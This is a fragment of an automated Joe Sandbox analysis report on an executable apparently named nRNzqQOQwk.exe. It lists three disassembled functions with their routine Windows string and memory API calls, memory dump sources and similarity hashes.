                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3355392842
                                                                            • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                            • Instruction ID: cb5700cda5be72b1964cac96af1ae0fa6ff587f55f39b04be5f0e3e76017d6e4
                                                                            • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                            • Instruction Fuzzy Hash: 78E0C2338011206BC7315F04EE04B2A777C6F48B26F020467ED447B3A087792C524BDC
                                                                            Function 00405859 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nRNzqQOQwk.exe,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 0040585F
                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nRNzqQOQwk.exe,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 0040586D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3370423016
                                                                            • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                            • Instruction ID: 48f05854ad55b04522f039bc0829861de91cdd92fb90a6685f37373cdb6fd5ef
                                                                            • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                            • Instruction Fuzzy Hash: 05D0C773409DB05EF30362259C04B9F6A98DF17700F094466E580E6191C6789D518BAE
                                                                            Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                            • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                            • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                            • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                            • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                            • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                            Function 00405978 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059A0
                                                                            • CharNextA.USER32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059B1
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                            • Instruction ID: 2b31bcc4a158946671b74a97661090b9e56dbbcbef6738157e9c676b7350d0db
                                                                            • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                            • Instruction Fuzzy Hash: 7DF0C272515518FFCB029FA5DC00D9EBBA8EF16360B2540AAF800F7310D274EE019BA9